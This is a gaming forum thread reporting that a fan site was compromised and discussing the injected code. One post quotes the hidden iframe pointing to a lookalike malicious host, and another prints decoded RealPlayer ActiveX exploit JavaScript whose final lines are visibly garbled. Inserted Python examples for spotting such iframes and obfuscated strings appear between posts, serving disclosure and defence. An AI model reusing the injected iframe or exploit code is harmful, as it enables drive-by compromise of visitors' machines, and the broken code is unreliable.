  1. #1
    Puppetmaster
    Join Date
    Nov 2007
    Posts
    62
    BG Level
    2
    FFXI Server
    Leviathan

    Ffxi-atlas.com WAS infected...fixed now.

    I apologize for posting this in the 2 hacked threads and in a new topic, but I can't find this reported anywhere else yet.

    Avoid ffxi-atlas.com, it has a similar iframe exploit as somepage.com used to have.

    (Iframe at the bottom right under the little affiliate banners, little black box)

    Points to:

    " <iframe src="http://www.playonlnie.com/indxe.html" height="0" width="0"></iframe> "
    Which contains the malicious javascript code.
    A member in my ls got a message from his browser (ie7) that ffxi-atlas required real player to properly display the page, which made me suspicious about it.

    http://ao.legionhq.org/atlas.jpg

  2. #2
    Ridill
    Join Date
    Oct 2005
    Posts
    10,227
    BG Level
    9
    FFXI Server
    Asura

    Re: Ffxi-atlas.com infected

    2007 called, they want their exploit back.

  3. #3
    Ive sucked 27 dicks, in a row.
    Join Date
    Apr 2006
    Posts
    1,570
    BG Level
    6

    Re: Ffxi-atlas.com infected

    Confirmed. It's encoded differently, not sure if it's the same exploit as before, but NoScript detects and stops it.

  4. #4
    Banned.

    Join Date
    Oct 2006
    Posts
    10,159
    BG Level
    9

    Re: Ffxi-atlas.com infected

    So, is there a way to fix this? Server side, something like learn to CSS, or learn2php

  5. #5
    Physicist
    Join Date
    Feb 2005
    Posts
    4,493
    BG Level
    7
    FFXIV Character
    Raineer Severus
    FFXIV Server
    Hyperion
    FFXI Server
    Siren
    WoW Realm
    Area 52

    Re: Ffxi-atlas.com infected

    Creative use of misspellings to fool people into allowing it in NoScript.

    >< wtf is up with all these sites

    edit: So is it in the doodleshop ad instead of the main page? Frame layout makes it look so, just curious who else to be mad at.

  6. #6

    Re: Ffxi-atlas.com infected

    inb4zomgBGisgoingtogetinfected

  7. #7
    Puppetmaster
    Join Date
    Nov 2007
    Posts
    62
    BG Level
    2
    FFXI Server
    Leviathan

    Re: Ffxi-atlas.com infected

    Just finished talking with GM. Took a bit of explaining why he could not view it in Internet Explorer, where it was, source code and so on, but he (or she) will report it to the appropriate department.

  8. #8
    Ranger
    9900klub

    Join Date
    Apr 2005
    Posts
    11,476
    BG Level
    9
    FFXIV Character
    Sonomaa Kihten
    FFXIV Server
    Gilgamesh
    FFXI Server
    Bahamut
    WoW Realm
    Durotan
    Blog Entries
    12

    Re: Ffxi-atlas.com infected

    Quote Originally Posted by The_OG_Nelta
    inb4zomgBGisgoingtogetinfected
    unlikely, you have my personal promise that I will shut the server down and make you watch happycat for hours until it gets fixed, the hole closed, the firewall retooled, and whoever did it on the fast track to mass DDoS land.

  9. #9
    The Tower
    Join Date
    Apr 2005
    Posts
    2,160
    BG Level
    7
    FFXIV Character
    Stromgarde Siren
    FFXIV Server
    Gilgamesh
    FFXI Server
    Siren

    Re: Ffxi-atlas.com infected

    Is this still the IE/Realplayer exploit that Vista is immune to?

  10. #10
    Relic Shield
    Join Date
    Jun 2007
    Posts
    1,658
    BG Level
    6
    FFXIV Character
    Orson Dara
    FFXIV Server
    Cactuar
    FFXI Server
    Alexander

    Re: Ffxi-atlas.com infected

    Quote Originally Posted by Sonomaa
    Quote Originally Posted by The_OG_Nelta
    inb4zomgBGisgoingtogetinfected
    unlikely, you have my personal promise that I will shut the server down and make you watch happycat for hours until it gets fixed, the hole closed, the firewall retooled, and whoever did it on the fast track to mass DDoS land.
    Why am I almost praying that the GSers try it here now.

  11. #11
    Relic Shield
    Join Date
    Jan 2007
    Posts
    1,811
    BG Level
    6
    FFXI Server
    Cerberus

    Re: Ffxi-atlas.com infected

    If you don't have lolRealPlayer installed, and have all your WindowsUpdates, can this even affect you?

    Also, wth is this:
    http://img211.imageshack.us/img211/6...wtf2rl5.th.png
    It happened yesterday and I forgot to post it.

  12. #12
    Banned.

    Join Date
    Dec 2005
    Posts
    15,022
    BG Level
    9

    Re: Ffxi-atlas.com infected

    Someone had an avatar from ffxionline.com (a forum) that was going through maint.

  13. #13
    RIDE ARMOR
    Join Date
    Dec 2007
    Posts
    13
    BG Level
    1

    Re: Ffxi-atlas.com infected

    Do those little black boxes always mean shit is up? I feel like I see them everywhere. Then again my mac gets about as much action as an old dried up republican at a rest stop. orz

  14. #14
    Ive sucked 27 dicks, in a row.
    Join Date
    Apr 2006
    Posts
    1,570
    BG Level
    6

    Re: Ffxi-atlas.com infected

    Quote Originally Posted by zue
    Do those little black boxes always mean shit is up? I feel like I see them everywhere. Then again my mac gets about as much action as an old dried up republican at a rest stop. orz
    They have "legitimate" uses, but they're frequently used for this kind of thing. All it means is that an external HTML page is pulled into the current page and displayed in a tiny box. If the HTML page does something that you don't need to see, then they might choose to put it in a tiny (1px by 1px) box like that.
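
The zero-size iframe quoted in post #1 and the misspelled host pointed out in post #5, turned into a check a site owner could run over served HTML. This is an added example, not part of any post in this thread; `TRUSTED_HOSTS`, `audit` and the benign banner URL in the sample are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately frames or links to.
TRUSTED_HOSTS = ("www.playonline.com", "ffxi-atlas.com")
# Constructed sample: the injected tag quoted in post #1 plus a benign banner frame.
SAMPLE = ('<iframe src="http://www.playonline.com/banner.html" width="468" height="60"></iframe>'
          '<iframe src="http://www.playonlnie.com/indxe.html" height="0" width="0"></iframe>')

def edit_distance(a, b):
    """Optimal string alignment distance: an adjacent swap counts as one edit."""
    d = [[max(i, j) if 0 in (i, j) else 0 for j in range(len(b) + 1)]
         for i in range(len(a) + 1)]
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                          d[i - 1][j - 1] + (a[i - 1] != b[j - 1]))
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


class IframeAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "").strip().lower() for k, v in attrs}
        host = urlparse(a.get("src", "")).hostname or ""
        style = a.get("style", "").replace(" ", "")
        reasons = []
        if (any(a.get(k, "").rstrip("px") in ("0", "1") for k in ("width", "height"))
                or "display:none" in style or "visibility:hidden" in style):
            reasons.append("hidden")
        if host and host not in TRUSTED_HOSTS:
            reasons.append("untrusted-host")
            reasons += ["lookalike-of:" + t for t in TRUSTED_HOSTS
                        if edit_distance(host, t) <= 2]
        if reasons:
            self.findings.append((host, reasons))


def audit(html):
    parser = IframeAudit()
    parser.feed(html)
    return parser.findings
```

Calling `audit(SAMPLE)` reports only the second frame, flagged as hidden, untrusted and a lookalike of `www.playonline.com`.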

  15. #15
    Fake Numbers
    Join Date
    Sep 2006
    Posts
    94
    BG Level
    2
    FFXI Server
    Ifrit

    Re: Ffxi-atlas.com infected

    I tried to find it and couldn't locate it with Firefox No-script. Has it already been fixed?

  16. #16
    The Tower
    Join Date
    Apr 2005
    Posts
    2,160
    BG Level
    7
    FFXIV Character
    Stromgarde Siren
    FFXIV Server
    Gilgamesh
    FFXI Server
    Siren

    Re: Ffxi-atlas.com infected

    The box is missing from my screen as well.

  17. #17
    Burn my Dread
    Join Date
    Jun 2007
    Posts
    328
    BG Level
    4
    FFXIV Character
    Shini Kimura
    FFXIV Server
    Diabolos
    FFXI Server
    Carbuncle

    Re: Ffxi-atlas.com infected

    It looks to be gone already.

  18. #18
    Salvage Bans
    Join Date
    Dec 2005
    Posts
    953
    BG Level
    5

    Re: Ffxi-atlas.com infected

    Yes, it was removed asap along with the backdoor PHP code in one of Atlas's pages. Thanks for catching it quickly Ramp.

    Looks like they're using the Real Audio exploit and ActiveX. Watch out where you visit with IE and have your activeX security set to maximum.

    The decoded javascript comes to

    Code:
    <!-- ScRIpT language=jAvAsCrIpT>
    mfpz="PR"
    acqc="OD"
    eqka="UC"
    xdzj="TV"
    bnry="ER"
    qycq="SI"
    rrqh="ON"
    kk();
    function kk()
    {
       var user = navigator.userAgent.toLowerCase();
       if(user.indexOf("nt 5.")==-1)
          return;
       if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
          return;
    
       try
       {
          Real = new ActiveXObject("IER" + "PCtl.I" + "ERP" + "Ctl.1");
       }catch(error)
       {
          return;
       }
       werq = Real.PlayerProperty(mfpz+acqc+eqka+xdzj+bnry+qycq+rrqh);
       sfsdf = "";
       jiji = unescape("%75%06%74%04");
       for(i=0;i<32*148;i++)
          sfsdf += "S";
    
       
       if(werq.indexOf("6.0.14.") == -1)
       {
          if(navigator.userLanguage.toLowerCase() == "zh-cn")
             ret = unescape("%7f%a5%60");
          else if(navigator.userLanguage.toLowerCase() == "en-us")
             ret = unescape("%4f%71%a4%60");
          else
             return;
       }
       else if(werq == "6.0.14.544")
          ret = unescape("%63%11%08%60");
       else if(werq == "6.0.14.550")
          ret = unescape("%63%11%04%60");
       else if(werq == "6.0.14.552")
          ret = unescape("%79%31%01%60");
       else if(werq == "6.0.14.543")
          ret = unescape("%79%31%09%60");
       else if(werq == "6.0.14.536")
          ret = unescape("%51%11%70%63");
       else
          return;
    
       \"c:\\Program Files\\";
       iusd  = "NetMeeting\\TestSnd";
       Real.Imporkswdf +iusd + ".wav", gogo,"", 0, 0);
    }
    
    </sCrIpT>
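
The script above never spells out the ActiveX ProgID or the property name it reads: both are assembled from short string pieces, which defeats a plain substring signature. The following added example (not part of the original post) folds those constant concatenations so a scanner can match the real strings; `fold`, `triage` and the excerpted sample are constructed for illustration.

```python
import re

TERM = r'(?:"[^"\\]*"|[A-Za-z_]\w*)'
CHAIN = re.compile(rf'{TERM}(?:\s*\+\s*{TERM})+')
ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*"([^"\\]*)"\s*;?\s*$', re.M)

# Constructed sample: lines excerpted from the script posted above (payload omitted).
SAMPLE = '''
mfpz="PR"
acqc="OD"
eqka="UC"
xdzj="TV"
bnry="ER"
qycq="SI"
rrqh="ON"
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1) return;
Real = new ActiveXObject("IER" + "PCtl.I" + "ERP" + "Ctl.1");
werq = Real.PlayerProperty(mfpz+acqc+eqka+xdzj+bnry+qycq+rrqh);
'''


def fold(js):
    """Resolve "a"+"b" and var+var chains whose parts are all known string constants."""
    consts = dict(ASSIGN.findall(js))

    def join(m):
        out = []
        for term in re.findall(TERM, m.group(0)):
            if term.startswith('"'):
                out.append(term[1:-1])
            elif term in consts:
                out.append(consts[term])
            else:
                return m.group(0)  # unknown identifier: leave the expression alone
        return '"' + "".join(out) + '"'

    return CHAIN.sub(join, js)


def triage(js):
    folded = fold(js)
    return {
        "progids": re.findall(r'new\s+ActiveXObject\s*\(\s*"([^"]+)"', folded),
        "property_reads": re.findall(r'\.PlayerProperty\s*\(\s*"([^"]+)"', folded),
        "browser_gated": bool(re.search(r'userAgent[\s\S]*indexOf\("msie', folded)),
    }
```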

  19. #19

    Re: Ffxi-atlas.com infected

    Quote Originally Posted by orson
    Quote Originally Posted by Sonomaa
    Quote Originally Posted by The_OG_Nelta
    inb4zomgBGisgoingtogetinfected
    unlikely, you have my personal promise that I will shut the server down and make you watch happycat for hours until it gets fixed, the hole closed, the firewall retooled, and whoever did it on the fast track to mass DDoS land.
    Why am I almost praying that the GSers try it here now.
    So am I. I would love to watch them get their asses beat by the collective FFXI community.

  20. #20
    Sea Torques
    Join Date
    Nov 2005
    Posts
    641
    BG Level
    5
    FFXI Server
    Asura

    Re: Ffxi-atlas.com infected

    Writing script tag in alternating caps, what a douche.
